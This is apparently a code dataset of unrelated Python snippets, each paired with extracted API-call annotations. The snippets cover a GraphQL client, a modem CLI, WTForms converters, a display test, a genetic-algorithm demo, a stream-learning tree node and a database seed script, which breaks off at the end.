class CustomJSONSerializer(Serializer):
def to_json(self, data, options=None):
options = options or {}
data = self.to_simple(data, options)
return json.dumps(data, cls=DjangoJSONEncoder)
def from_json(self, content):
data = json.loads(content)
return data
|
[
"json.loads",
"json.dumps"
] |
[((294, 333), 'json.dumps', 'json.dumps', (['data'], {'cls': 'DjangoJSONEncoder'}), '(data, cls=DjangoJSONEncoder)\n', (304, 333), False, 'import json\n'), ((384, 403), 'json.loads', 'json.loads', (['content'], {}), '(content)\n', (394, 403), False, 'import json\n')]
|
from functools import lru_cache
from typing import Dict
import base64
try:
from ..league_process import find_path_of_league
except (ImportError, ValueError):  # the relative import fails when the module is run directly
from src.league_client_api.league_process import find_path_of_league
def _read_lockfile() -> Dict:
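    # The lockfile is expected to be colon-separated (name:pid:port:password:protocol);
    # fields 2 and 3 hold the port and password.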
path = find_path_of_league()
with open(path, 'r') as f:
lock_file = f.read().split(':')
return {'port': lock_file[2], 'password': lock_file[3]}
@lru_cache
def get_lockfile_content() -> Dict:
lock_file = _read_lockfile()
username = 'riot'
port = lock_file['port']
password = lock_file['password']
encrypted_auth = base64.b64encode(f'{username}:{password}'.encode('utf-8')).decode('utf-8')
print({'username': username, 'port': port, 'password': password, 'encrypted': encrypted_auth})
return {'username': username, 'port': port, 'password': password, 'encrypted': encrypted_auth}
def clear_cache():
get_lockfile_content.cache_clear()
|
[
"src.league_client_api.league_process.find_path_of_league"
] |
[((264, 285), 'src.league_client_api.league_process.find_path_of_league', 'find_path_of_league', ([], {}), '()\n', (283, 285), False, 'from src.league_client_api.league_process import find_path_of_league\n')]
|
from st7920 import Screen
from gfx import GFX
from sysfont import sysfont
import machine
import time
machine.freq(160000000)
spi = machine.SPI(1, baudrate=80000000, polarity=1, phase=1)
screen = Screen(slaveSelectPin=machine.Pin(15), resetDisplayPin=machine.Pin(5)) # use machine.Pin; bare Pin was never imported
draw=GFX(128,64,screen.plot)
#screen.set_rotation(2)
screen.clear()
def test1():
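    # Time a full screen redraw and print the elapsed seconds.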
t0=time.ticks_ms()
# screen.fill_rect(0,0,127,63)
screen.redraw()
t1=time.ticks_ms()
delta=time.ticks_diff(t1,t0)
print(delta/1000)
def test2():
t0=time.ticks_ms()
# draw.fill_rect(0,0,128,64,1)
screen.redraw()
t1=time.ticks_ms()
delta=time.ticks_diff(t1,t0)
print(delta/1000)
test1()
test2()
|
[
"machine.SPI",
"time.ticks_ms",
"gfx.GFX",
"machine.freq",
"time.ticks_diff"
] |
[((102, 125), 'machine.freq', 'machine.freq', (['(160000000)'], {}), '(160000000)\n', (114, 125), False, 'import machine\n'), ((132, 186), 'machine.SPI', 'machine.SPI', (['(1)'], {'baudrate': '(80000000)', 'polarity': '(1)', 'phase': '(1)'}), '(1, baudrate=80000000, polarity=1, phase=1)\n', (143, 186), False, 'import machine\n'), ((256, 281), 'gfx.GFX', 'GFX', (['(128)', '(64)', 'screen.plot'], {}), '(128, 64, screen.plot)\n', (259, 281), False, 'from gfx import GFX\n'), ((340, 355), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (353, 355), False, 'import time\n'), ((418, 433), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (431, 433), False, 'import time\n'), ((444, 467), 'time.ticks_diff', 'time.ticks_diff', (['t1', 't0'], {}), '(t1, t0)\n', (459, 467), False, 'import time\n'), ((510, 525), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (523, 525), False, 'import time\n'), ((588, 603), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (601, 603), False, 'import time\n'), ((614, 637), 'time.ticks_diff', 'time.ticks_diff', (['t1', 't0'], {}), '(t1, t0)\n', (629, 637), False, 'import time\n')]
|
import click
import tabulate
from .module import SaraN211Module, PingError
def connect_module(module: SaraN211Module, app_ctx):
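    # Shared connect flow: configure the PDP context, URCs, registration and PSM, then attach to the operator.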
click.echo(click.style(f"Connecting to network...", fg="yellow", bold=True))
module.read_module_status()
if app_ctx.apn:
module.set_pdp_context(apn=app_ctx.apn)
module.enable_signaling_connection_urc()
module.enable_network_registration()
module.enable_radio_functions()
if app_ctx.psm:
module.enable_psm_mode()
else:
module.disable_psm_mode()
module.connect(app_ctx.mno)
click.echo(click.style(f"Connected!", fg="yellow", bold=True))
@click.command()
@click.pass_obj
def connect(app_ctx):
"""
Connect to the network and get general info on module and network
"""
module: SaraN211Module = app_ctx.module
connect_module(module, app_ctx)
header = ["IMEI", "IMSI", "ICCID", "IP", "APN"]
data = [[module.imei, module.imsi, module.iccid, module.ip, module.apn]]
click.echo(
click.style(
tabulate.tabulate(
data, header, tablefmt="github", numalign="left", stralign="left"
),
fg="red",
)
)
@click.command()
@click.argument("ip")
@click.option("--runs", "-r", default=1, help="How many times should we ping")
@click.pass_obj
def ping(app_ctx, ip, runs):
"""
Ping an IP address
"""
module: SaraN211Module = app_ctx.module
connect_module(module, app_ctx)
click.echo(click.style(f"Pinging IP {ip}", fg="blue"))
results = []
for i in range(0, runs):
try:
ttl, rtt = module.ping(ip)
results.append((rtt, ttl))
click.echo(click.style(f"Success: rtt: {rtt}, ttl: {ttl}", fg="red"))
except PingError as e:
click.echo(click.style(f"**\t{e.args[0]}\t**", fg="red", bold=True))
click.echo("\nResults:")
click.echo(
click.style(
tabulate.tabulate(
results,
headers=["Round trip time (ms)", "Time to live (ms)"],
tablefmt="github",
numalign="left",
stralign="left",
),
fg="red",
)
)
@click.command()
@click.pass_obj
def stats(app_ctx):
"""
Print statistics from the module.
"""
module: SaraN211Module = app_ctx.module
connect_module(module, app_ctx)
click.echo(click.style(f"Collecting statistics...", fg="blue"))
module.update_radio_statistics()
header = ["Stat", "Value"]
data = list()
data.append(("ECL", f"{module.radio_ecl}"))
data.append(("Signal power", f"{module.radio_signal_power} dBm"))
data.append(("Total power", f"{module.radio_total_power} dBm"))
data.append(("Tx power", f"{module.radio_tx_power} dBm"))
data.append(("Tx time", f"{module.radio_tx_time} ms"))
data.append(("Rx time", f"{module.radio_rx_time} ms"))
data.append(("Cell id", f"{module.radio_cell_id}"))
data.append(("Physical cell id", f"{module.radio_pci}"))
data.append(("SNR", f"{module.radio_snr}"))
    data.append(("RSRQ", f"{module.radio_rsrq} dB"))
click.echo(
click.style(
tabulate.tabulate(
data, header, tablefmt="github", numalign="left", stralign="left"
),
fg="red",
)
)
@click.command()
@click.pass_obj
def reboot(app_ctx):
"""
Reboot the module
"""
module: SaraN211Module = app_ctx.module
click.echo(click.style(f"Rebooting module {module}...", fg="red", bold=True))
module.reboot()
click.echo(click.style(f"Module rebooted", fg="red", bold=True))
|
[
"click.argument",
"click.echo",
"click.option",
"click.command",
"tabulate.tabulate",
"click.style"
] |
[((634, 649), 'click.command', 'click.command', ([], {}), '()\n', (647, 649), False, 'import click\n'), ((1189, 1204), 'click.command', 'click.command', ([], {}), '()\n', (1202, 1204), False, 'import click\n'), ((1206, 1226), 'click.argument', 'click.argument', (['"""ip"""'], {}), "('ip')\n", (1220, 1226), False, 'import click\n'), ((1228, 1305), 'click.option', 'click.option', (['"""--runs"""', '"""-r"""'], {'default': '(1)', 'help': '"""How many times should we ping"""'}), "('--runs', '-r', default=1, help='How many times should we ping')\n", (1240, 1305), False, 'import click\n'), ((2211, 2226), 'click.command', 'click.command', ([], {}), '()\n', (2224, 2226), False, 'import click\n'), ((3413, 3428), 'click.command', 'click.command', ([], {}), '()\n', (3426, 3428), False, 'import click\n'), ((1865, 1889), 'click.echo', 'click.echo', (['"""\nResults:"""'], {}), "('\\nResults:')\n", (1875, 1889), False, 'import click\n'), ((145, 209), 'click.style', 'click.style', (['f"""Connecting to network..."""'], {'fg': '"""yellow"""', 'bold': '(True)'}), "(f'Connecting to network...', fg='yellow', bold=True)\n", (156, 209), False, 'import click\n'), ((579, 629), 'click.style', 'click.style', (['f"""Connected!"""'], {'fg': '"""yellow"""', 'bold': '(True)'}), "(f'Connected!', fg='yellow', bold=True)\n", (590, 629), False, 'import click\n'), ((1485, 1527), 'click.style', 'click.style', (['f"""Pinging IP {ip}"""'], {'fg': '"""blue"""'}), "(f'Pinging IP {ip}', fg='blue')\n", (1496, 1527), False, 'import click\n'), ((2412, 2463), 'click.style', 'click.style', (['f"""Collecting statistics..."""'], {'fg': '"""blue"""'}), "(f'Collecting statistics...', fg='blue')\n", (2423, 2463), False, 'import click\n'), ((3563, 3628), 'click.style', 'click.style', (['f"""Rebooting module {module}..."""'], {'fg': '"""red"""', 'bold': '(True)'}), "(f'Rebooting module {module}...', fg='red', bold=True)\n", (3574, 3628), False, 'import click\n'), ((3665, 3717), 'click.style', 'click.style', (['f"""Module rebooted"""'], {'fg': '"""red"""', 'bold': '(True)'}), "(f'Module rebooted', fg='red', bold=True)\n", (3676, 3717), False, 'import click\n'), ((1032, 1120), 'tabulate.tabulate', 'tabulate.tabulate', (['data', 'header'], {'tablefmt': '"""github"""', 'numalign': '"""left"""', 'stralign': '"""left"""'}), "(data, header, tablefmt='github', numalign='left',\n stralign='left')\n", (1049, 1120), False, 'import tabulate\n'), ((1939, 2077), 'tabulate.tabulate', 'tabulate.tabulate', (['results'], {'headers': "['Round trip time (ms)', 'Time to live (ms)']", 'tablefmt': '"""github"""', 'numalign': '"""left"""', 'stralign': '"""left"""'}), "(results, headers=['Round trip time (ms)',\n 'Time to live (ms)'], tablefmt='github', numalign='left', stralign='left')\n", (1956, 2077), False, 'import tabulate\n'), ((3256, 3344), 'tabulate.tabulate', 'tabulate.tabulate', (['data', 'header'], {'tablefmt': '"""github"""', 'numalign': '"""left"""', 'stralign': '"""left"""'}), "(data, header, tablefmt='github', numalign='left',\n stralign='left')\n", (3273, 3344), False, 'import tabulate\n'), ((1690, 1747), 'click.style', 'click.style', (['f"""Success: rtt: {rtt}, ttl: {ttl}"""'], {'fg': '"""red"""'}), "(f'Success: rtt: {rtt}, ttl: {ttl}', fg='red')\n", (1701, 1747), False, 'import click\n'), ((1803, 1859), 'click.style', 'click.style', (['f"""**\t{e.args[0]}\t**"""'], {'fg': '"""red"""', 'bold': '(True)'}), "(f'**\\t{e.args[0]}\\t**', fg='red', bold=True)\n", (1814, 1859), False, 'import click\n')]
|
import wtforms.ext.appengine.ndb as wtfndb
import wtforms
from google.appengine.ext import ndb
from . import fields
### Additional Converters
def add_convertor(property_type, converter_func):
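    # Attach converter_func to wtforms' NDB ModelConverter as convert_<property_type>.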
setattr(wtfndb.ModelConverter, 'convert_%s' % property_type, converter_func)
def convert_UserProperty(self, model, prop, kwargs):
"""Returns a form field for a ``ndb.UserProperty``."""
if isinstance(prop, ndb.Property) and (prop._auto_current_user or prop._auto_current_user_add):
return None
kwargs['validators'].append(wtforms.validators.email())
kwargs['validators'].append(wtforms.validators.length(max=500))
return fields.UserField(**kwargs)
def convert_KeyProperty(self, model, prop, kwargs):
"""Returns a form field for a ``ndb.KeyProperty``."""
kwargs['kind'] = prop._kind
kwargs.setdefault('allow_blank', not prop._required)
if not prop._repeated:
return fields.KeyPropertyField(**kwargs)
else:
del kwargs['allow_blank']
return fields.MultipleReferenceField(**kwargs)
def convert_BlobKeyProperty(self, model, prop, kwargs):
"""Returns a form field for a ``ndb.BlobKeyProperty``."""
return fields.BlobKeyField(**kwargs)
def convert_GeoPtProperty(self, model, prop, kwargs):
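    """Returns a form field for a ``ndb.GeoPtProperty``."""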
return fields.GeoPtPropertyField(**kwargs)
def fallback_converter(self, model, prop, kwargs):
pass
setattr(wtfndb.ModelConverter, 'fallback_converter', fallback_converter)
# Monkey-patch wtf's converters
add_convertor('UserProperty', convert_UserProperty)
add_convertor('KeyProperty', convert_KeyProperty)
add_convertor('BlobKeyProperty', convert_BlobKeyProperty)
add_convertor('GeoPtProperty', convert_GeoPtProperty)
|
[
"wtforms.validators.email",
"wtforms.validators.length"
] |
[((542, 568), 'wtforms.validators.email', 'wtforms.validators.email', ([], {}), '()\n', (566, 568), False, 'import wtforms\n'), ((602, 636), 'wtforms.validators.length', 'wtforms.validators.length', ([], {'max': '(500)'}), '(max=500)\n', (627, 636), False, 'import wtforms\n')]
|
import aiohttp
import json
import copy
from typing import Tuple
from aiogqlc.utils import (
is_file_like,
is_file_list_like,
contains_file_variable,
null_file_variables,
)
class GraphQLClient:
def __init__(self, endpoint: str, headers: dict = None) -> None:
self.endpoint = endpoint
self.headers = headers or {}
def prepare_headers(self):
headers = copy.deepcopy(self.headers)
if aiohttp.hdrs.ACCEPT not in headers:
headers[aiohttp.hdrs.ACCEPT] = "application/json"
return headers
@classmethod
def prepare_json_data(
cls, query: str, variables: dict = None, operation: str = None
) -> dict:
data = {"query": query}
if variables:
data["variables"] = null_file_variables(variables)
if operation:
data["operationName"] = operation
return data
@classmethod
def prepare_files(cls, variables: dict) -> Tuple[dict, list]:
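        # Build the "map" object and file fields required by the GraphQL multipart request spec.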
file_map = dict()
file_fields = list()
map_index = 0
for key, value in variables.items():
if is_file_like(value):
file_map[str(map_index)] = ["variables.{}".format(key)]
file_fields.append([str(map_index), value])
map_index += 1
elif is_file_list_like(value):
file_list_index = 0
for item in value:
file_map[str(map_index)] = [
"variables.{}.{}".format(key, file_list_index)
]
file_fields.append([str(map_index), item])
file_list_index += 1
map_index += 1
return file_map, file_fields
@classmethod
def prepare_multipart(
cls, query: str, variables: dict, operation: str = None
) -> aiohttp.FormData:
data = aiohttp.FormData()
operations_json = json.dumps(cls.prepare_json_data(query, variables, operation))
file_map, file_fields = cls.prepare_files(variables)
data.add_field("operations", operations_json, content_type="application/json")
data.add_field("map", json.dumps(file_map), content_type="application/json")
data.add_fields(*file_fields)
return data
async def execute(
self, query: str, variables: dict = None, operation: str = None
) -> aiohttp.ClientResponse:
async with aiohttp.ClientSession() as session:
if variables and contains_file_variable(variables):
data = self.prepare_multipart(query, variables, operation)
headers = self.prepare_headers()
else:
data = json.dumps(self.prepare_json_data(query, variables, operation))
headers = self.prepare_headers()
headers[aiohttp.hdrs.CONTENT_TYPE] = "application/json"
async with session.post(
self.endpoint, data=data, headers=headers
) as response:
await response.read()
return response
|
[
"aiogqlc.utils.null_file_variables",
"copy.deepcopy",
"aiohttp.FormData",
"aiogqlc.utils.is_file_list_like",
"aiogqlc.utils.is_file_like",
"json.dumps",
"aiohttp.ClientSession",
"aiogqlc.utils.contains_file_variable"
] |
[((400, 427), 'copy.deepcopy', 'copy.deepcopy', (['self.headers'], {}), '(self.headers)\n', (413, 427), False, 'import copy\n'), ((1884, 1902), 'aiohttp.FormData', 'aiohttp.FormData', ([], {}), '()\n', (1900, 1902), False, 'import aiohttp\n'), ((777, 807), 'aiogqlc.utils.null_file_variables', 'null_file_variables', (['variables'], {}), '(variables)\n', (796, 807), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n'), ((1117, 1136), 'aiogqlc.utils.is_file_like', 'is_file_like', (['value'], {}), '(value)\n', (1129, 1136), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n'), ((2170, 2190), 'json.dumps', 'json.dumps', (['file_map'], {}), '(file_map)\n', (2180, 2190), False, 'import json\n'), ((2431, 2454), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (2452, 2454), False, 'import aiohttp\n'), ((1318, 1342), 'aiogqlc.utils.is_file_list_like', 'is_file_list_like', (['value'], {}), '(value)\n', (1335, 1342), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n'), ((2496, 2529), 'aiogqlc.utils.contains_file_variable', 'contains_file_variable', (['variables'], {}), '(variables)\n', (2518, 2529), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n')]
|
import json
from .settings import app_settings
_cached_attrs = {}
class Settings:
"""
A proxy to get or set app settings.
"""
def __getattr__(self, attr):
if attr in _cached_attrs:
return _cached_attrs[attr]
return getattr(app_settings, attr, None)
def __setattr__(self, attr, value):
if hasattr(app_settings, attr):
setattr(app_settings, attr, value)
_cached_attrs[attr] = value
def from_dict(self, settings):
"""
Set settings from dictionary object.
"""
for attr, value in settings.items():
setattr(self, attr, value)
def from_json(self, settings):
"""
Set settings from JSON object.
"""
dict_settings = json.loads(settings)
self.from_dict(dict_settings)
def from_json_file(self, path):
"""
Set settings from JSON file.
"""
with open(path) as fp:
dict_settings = json.load(fp)
self.from_dict(dict_settings)
def as_dict(self):
"""
Export all settings as dictionary object.
"""
dict_settings = {}
for key, value in _cached_attrs.items():
dict_settings[key] = value
for key in app_settings.defaults:
dict_settings.update({key: getattr(app_settings, key)})
return dict_settings
settings = Settings()
|
[
"json.load",
"json.loads"
] |
[((774, 794), 'json.loads', 'json.loads', (['settings'], {}), '(settings)\n', (784, 794), False, 'import json\n'), ((990, 1003), 'json.load', 'json.load', (['fp'], {}), '(fp)\n', (999, 1003), False, 'import json\n')]
|
#!/usr/bin/python3
# Author: <NAME>
from tkinter import *
import random, math, time, copy, sys # sys is needed for sys.maxsize in selectFittest
### Global variables ###
height, width = 300, 100
goal = (width/4, 5*height/6)
start = (3*width/4, height/6)
refreshRate = 1
population = 100
generations = 100
firstGen = True
goalReached = False
won = False
allDead = False
### Dot class ###
class Dot: # dot object
def __init__(self):
global width, height
self.x = start[0]
self.y = start[1]
self.alive = True
self.score = 0
self.moves = []
self.fittest = False
def __str__(self):
return "x : "+str(self.x)+", y : "+str(self.y)+", alive : "+str(self.alive)+", score : "+str(self.score)+", fittest ="+str(self.fittest)+", move number :"+str(len(self.moves))
def isAlive(self):
if self.x <= 0 or self.x >= width-5 or self.y <= 0 or self.y >= height-5 or (self.x < goal[0]+10 and self.x > goal[0]-10 and self.y < goal[1]+10 and self.y > goal[1]-10):
self.alive = False
def hasWon(self):
if self.x < goal[0]+10 and self.x > goal[0]-10 and self.y < goal[1]+10 and self.y > goal[1]-10 :
return True
return False
def move(self):
self.isAlive()
if (self.alive == True):
newX, newY = self.x, self.y
rand = random.random()
if (rand <= 0.25):
newX += 5
elif (rand <= 0.5):
newX -= 5
elif (rand <= 0.75):
newY += 5
else:
newY -= 5
self.moves.append((newX-self.x, newY-self.y))
self.x, self.y = newX, newY
self.fitness()
def fitness(self):
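        # Lower score is better: pure distance to the goal at first; once any dot has
        # reached the goal, the path length is weighed in as well.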
global goal
if goalReached == True:
            if abs(self.x-goal[0]) == 5 and abs(self.y-goal[1]) == 5: # case where the dot reaches the goal diagonally
                print("diag")
                self.score = len(self.moves)*(self.y-goal[1]) # zero out the difference between the dot's x and the goal's
else :
self.score = len(self.moves)*math.sqrt((self.x-goal[0])**2+(self.y-goal[1])**2)
else :
self.score = math.sqrt((self.x-goal[0])**2+(self.y-goal[1])**2)
def moveMutated(self, fittest):
self.isAlive()
if (self.alive == True):
newX, newY = self.x, self.y
if (random.random() <= 0.1 or len(self.moves) >= len(fittest.moves)) and self.fittest == False:
rand = random.random()
if (rand <= 0.25):
newX += 5
elif (rand <= 0.5):
newX -= 5
elif (rand <= 0.75):
newY += 5
else:
newY -= 5
else:
newX += fittest.moves[len(self.moves)][0]
newY += fittest.moves[len(self.moves)][1]
self.moves.append((newX-self.x, newY-self.y))
self.x, self.y = newX, newY
self.fitness()
### Board class ###
class Board:
def __init__(self):
global height, width
self.canvas = Canvas(root, width=width, height=height, background='white')
self.dots = []
self.fittest = None
self.job = None
self.createPopulation()
def addDot(self, dot):
self.dots.append(dot)
self.canvas.create_oval(dot.x, dot.y, dot.x+5, dot.y+5, fill='black')
def createPopulation(self):
for i in range(population):
self.dots.append(Dot())
def update(self, firstGen):
global won, allDead
allDead = True
for dot in self.dots:
if firstGen == True:
dot.move()
else:
dot.moveMutated(self.fittest)
if dot.fittest == True:
self.canvas.create_oval(dot.x, dot.y, dot.x+5, dot.y+5, fill='red')
else :
self.canvas.create_oval(dot.x, dot.y, dot.x+5, dot.y+5, fill='black')
if dot.hasWon():
won = True
break
if dot.alive :
allDead = False
def play(self):
global goal, won, firstGen, goalReached
self.canvas.delete("all")
self.canvas.create_oval(goal[0], goal[1], goal[0]+5, goal[1]+5, fill='green')
self.update(firstGen)
if won == False and allDead == False:
self.job = self.canvas.after(refreshRate, self.play)
else :
if allDead == False :
self.killAll()
firstGen = False
goalReached = True
root.after(1000, root.quit)
def cancel(self):
if self.job is not None:
self.canvas.after_cancel(self.job)
self.job = None
def selectFittest(self):
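        # Keep the dot with the lowest (best) fitness score as the parent of the next generation.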
minFitness = sys.maxsize
for dot in self.dots:
if dot.score < minFitness:
self.fittest = dot
minFitness = dot.score
self.fittest.fittest = True
print("Score du fittest :"+str(self.fittest.score), self.fittest.x-goal[0], self.fittest.y-goal[1])
def heritage(self):
self.dots = []
fitDot = copy.deepcopy(self.fittest)
fitDot.alive, fitDot.x, fitDot.y, fitDot.moves, fitDot.win = True, start[0], start[1], [], False
normalDot = copy.deepcopy(fitDot)
normalDot.fittest = False
for i in range(population-1):
self.dots.append(copy.deepcopy(normalDot))
self.dots.append(fitDot)
def killAll(self):
global root
for dot in self.dots :
dot.alive = False
### Main ###
if __name__ == '__main__':
generation = 0
root = Tk()
board = Board()
board.canvas.pack()
root.title("Gen "+str(generation))
board.play()
root.mainloop()
firstGen = False
board.cancel()
board.selectFittest()
generation += 1
while generation <= generations:
won = False
root.title("Gen "+str(generation))
board.heritage()
board.play()
root.mainloop()
board.cancel()
board.selectFittest()
generation += 1
# TODO: compare the gap between the old and new fittest; show the fittest's move count in the window
# The scoring function favors few moves too strongly (a dot that dies quickly scores well)
|
[
"random.random",
"copy.deepcopy",
"math.sqrt"
] |
[((4242, 4269), 'copy.deepcopy', 'copy.deepcopy', (['self.fittest'], {}), '(self.fittest)\n', (4255, 4269), False, 'import random, math, time, copy\n'), ((4386, 4407), 'copy.deepcopy', 'copy.deepcopy', (['fitDot'], {}), '(fitDot)\n', (4399, 4407), False, 'import random, math, time, copy\n'), ((1200, 1215), 'random.random', 'random.random', ([], {}), '()\n', (1213, 1215), False, 'import random, math, time, copy\n'), ((1859, 1919), 'math.sqrt', 'math.sqrt', (['((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)'], {}), '((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)\n', (1868, 1919), False, 'import random, math, time, copy\n'), ((2129, 2144), 'random.random', 'random.random', ([], {}), '()\n', (2142, 2144), False, 'import random, math, time, copy\n'), ((4488, 4512), 'copy.deepcopy', 'copy.deepcopy', (['normalDot'], {}), '(normalDot)\n', (4501, 4512), False, 'import random, math, time, copy\n'), ((1783, 1843), 'math.sqrt', 'math.sqrt', (['((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)'], {}), '((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)\n', (1792, 1843), False, 'import random, math, time, copy\n'), ((2026, 2041), 'random.random', 'random.random', ([], {}), '()\n', (2039, 2041), False, 'import random, math, time, copy\n')]
|
import numpy as np
from skmultiflow.trees.nodes import ActiveLearningNodePerceptron
from skmultiflow.trees.attribute_observer import NominalAttributeRegressionObserver
from skmultiflow.trees.attribute_observer import NumericAttributeRegressionObserver
from skmultiflow.utils import get_dimensions
class RandomLearningNodePerceptron(ActiveLearningNodePerceptron):
""" Learning Node for regression tasks that always use a linear perceptron
model to provide responses.
Parameters
----------
initial_class_observations: dict
In regression tasks this dictionary carries the sufficient statistics
to perform online variance calculation. They refer to the number of
observations (key '0'), the sum of the target values (key '1'), and
the sum of the squared target values (key '2').
max_features: int
Number of attributes per subset for each node split.
parent_node: RandomLearningNodePerceptron (default=None)
A node containing statistics about observed data.
random_state: int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, initial_class_observations, max_features, parent_node=None,
random_state=None):
super().__init__(initial_class_observations, parent_node, random_state)
self.max_features = max_features
self.list_attributes = np.array([])
def learn_from_instance(self, X, y, weight, rht):
"""Update the node with the provided instance.
Parameters
----------
X: numpy.ndarray of length equal to the number of features.
Instance attributes for updating the node.
y: float
Instance target value.
weight: float
Instance weight.
rht: HoeffdingTreeRegressor
Regression Hoeffding Tree to update.
"""
# In regression, the self._observed_class_distribution dictionary keeps three statistics:
# [0] sum of sample seen by the node
# [1] sum of target values
# [2] sum of squared target values
# These statistics are useful to calculate the mean and to calculate the variance reduction
if self.perceptron_weight is None:
self.perceptron_weight = self.random_state.uniform(-1, 1, len(X)+1)
try:
self._observed_class_distribution[0] += weight
self._observed_class_distribution[1] += y * weight
self._observed_class_distribution[2] += y * y * weight
except KeyError:
self._observed_class_distribution[0] = weight
self._observed_class_distribution[1] = y * weight
self._observed_class_distribution[2] = y * y * weight
# Update perceptron
self.samples_seen = self._observed_class_distribution[0]
if rht.learning_ratio_const:
learning_ratio = rht.learning_ratio_perceptron
else:
learning_ratio = rht.learning_ratio_perceptron / \
(1 + self.samples_seen * rht.learning_ratio_decay)
# Loop for compatibility with bagging methods
for i in range(int(weight)):
self.update_weights(X, y, learning_ratio, rht)
if self.list_attributes.size == 0:
self.list_attributes = self._sample_features(get_dimensions(X)[1])
for i in self.list_attributes:
try:
obs = self._attribute_observers[i]
except KeyError:
if rht.nominal_attributes is not None and i in rht.nominal_attributes:
obs = NominalAttributeRegressionObserver()
else:
obs = NumericAttributeRegressionObserver()
self._attribute_observers[i] = obs
obs.observe_attribute_class(X[i], y, weight)
def _sample_features(self, n_features):
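        # Draw max_features attribute indices uniformly at random, without replacement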
return self.random_state.choice(
n_features, size=self.max_features, replace=False
)
|
[
"skmultiflow.trees.attribute_observer.NominalAttributeRegressionObserver",
"skmultiflow.trees.attribute_observer.NumericAttributeRegressionObserver",
"skmultiflow.utils.get_dimensions",
"numpy.array"
] |
[((1649, 1661), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (1657, 1661), True, 'import numpy as np\n'), ((3595, 3612), 'skmultiflow.utils.get_dimensions', 'get_dimensions', (['X'], {}), '(X)\n', (3609, 3612), False, 'from skmultiflow.utils import get_dimensions\n'), ((3867, 3903), 'skmultiflow.trees.attribute_observer.NominalAttributeRegressionObserver', 'NominalAttributeRegressionObserver', ([], {}), '()\n', (3901, 3903), False, 'from skmultiflow.trees.attribute_observer import NominalAttributeRegressionObserver\n'), ((3952, 3988), 'skmultiflow.trees.attribute_observer.NumericAttributeRegressionObserver', 'NumericAttributeRegressionObserver', ([], {}), '()\n', (3986, 3988), False, 'from skmultiflow.trees.attribute_observer import NumericAttributeRegressionObserver\n')]
|
'''
Populates the SQLite database with
a user and a sequence with three components.
'''
import json
from pyelixys.web.database.model import session
from pyelixys.web.database.model import Roles
from pyelixys.web.database.model import User
from pyelixys.web.database.model import Sequence
from pyelixys.web.database.model import Component
from pyelixys.web.database.model import Reagents
from pyelixys.web.database.model import metadata
# Import hashing library for pw hash
import hashlib
def create_role():
# Create admin role
role = Roles('Administrator', 255)
session.add(role)
session.commit()
return role
def get_default_user_client_state():
""" Silly work around for current webserver """
#TODO Remove client default state server dependency
return ({"sequenceid": 0,
"runhistorysort": {"column": "date&time", "type": "sort", "mode": "down"},
"lastselectscreen": "SAVED",
"selectsequencesort": {"column": "name", "type": "sort", "mode": "down"},
"prompt": {
"show": False, "screen": "", "text2": "", "text1": "",
"edit2default": "", "buttons": [], "title": "",
"edit1validation": "", "edit1": False, "edit2": False,
"edit1default": "", "edit2validation": "",
"type": "promptstate"},
"screen": "HOME",
"type": "clientstate",
"componentid": 0})
def get_default_component_state(cassette, reactor_count):
''' Silly work around for the current webserver '''
#TODO Remove Component state/details dependency
# Create a dictionary and append to it the
# details needed
details_dict = {}
details_dict['note'] = cassette.Note
details_dict['sequenceid'] = cassette.SequenceID
details_dict['reactor'] = reactor_count
details_dict['validationerror'] = False
details_dict['componenttype'] = cassette.Type
details_dict['type'] = 'component'
details_dict['id'] = cassette.ComponentID
# For all the cassette's reagents, append their ids
details_dict['reagent'] = []
for reagent in cassette.reagents:
details_dict['reagent'].append(reagent.ReagentID)
return details_dict
def create_user(role_id):
# Let's create a default user
    # Hash the password using md5 and return it as hex
new_user = User()
new_user.Username = 'devel'
new_user.Password = hashlib.md5('devel').hexdigest()
new_user.FirstName = 'Sofiebio'
new_user.LastName = 'Developer'
new_user.Email = '<EMAIL>'
new_user.RoleID = role_id
new_user.ClientState = json.dumps(
get_default_user_client_state())
session.add(new_user)
session.commit()
return new_user
def create_sequence(user_id):
# Create a new sequence for the user
new_seq = Sequence()
new_seq.Name = 'Sequence 1'
new_seq.Component = 'Test Sequence'
new_seq.Type = 'Saved'
new_seq.UserID = user_id
session.add(new_seq)
session.commit()
return new_seq
def create_cassette_components(sequence_id):
# Create a new set of component cassettes
cass_list = []
for cass_count in range(1,4):
new_comp = Component()
new_comp.SequenceID = sequence_id
new_comp.Type = 'CASSETTE'
new_comp.Note = ''
# Leave details empty, update later
new_comp.Details = ''
session.add(new_comp)
session.commit()
cass_list.append(new_comp)
return cass_list
def create_reagents(sequence_id, cassettes):
# Let's create some empty reagents
# For each of the 3 cassettes, create
# 12 reagents
for cassette in cassettes:
for reg_count in range(1,13):
reagent = Reagents()
reagent.SequenceID = sequence_id
reagent.Position = reg_count
reagent.component = cassette
reagent.ComponentID = cassette.ComponentID
session.add(reagent)
session.commit()
def update_sequence_details(sequence):
# Update the first component id and
# component count of the sequence's fields
# Query for the first component matched
component_id = session.query(Component).filter_by(
SequenceID = sequence.SequenceID).first().ComponentID
sequence.FirstComponentID = component_id
sequence.ComponentCount = 3
sequence.Valid = 1
session.commit()
def update_component_details(cassettes):
# Update the details field of each new
# cassette component
# Keep a reactor count
reactor_count = 1
for cassette in cassettes:
cassette.Details = json.dumps(
get_default_component_state(
cassette,
reactor_count))
session.commit()
reactor_count += 1
if __name__ == '__main__':
'''
Running this file as a script
shall execute the following which
will create a new role and user.
The script shall also create a
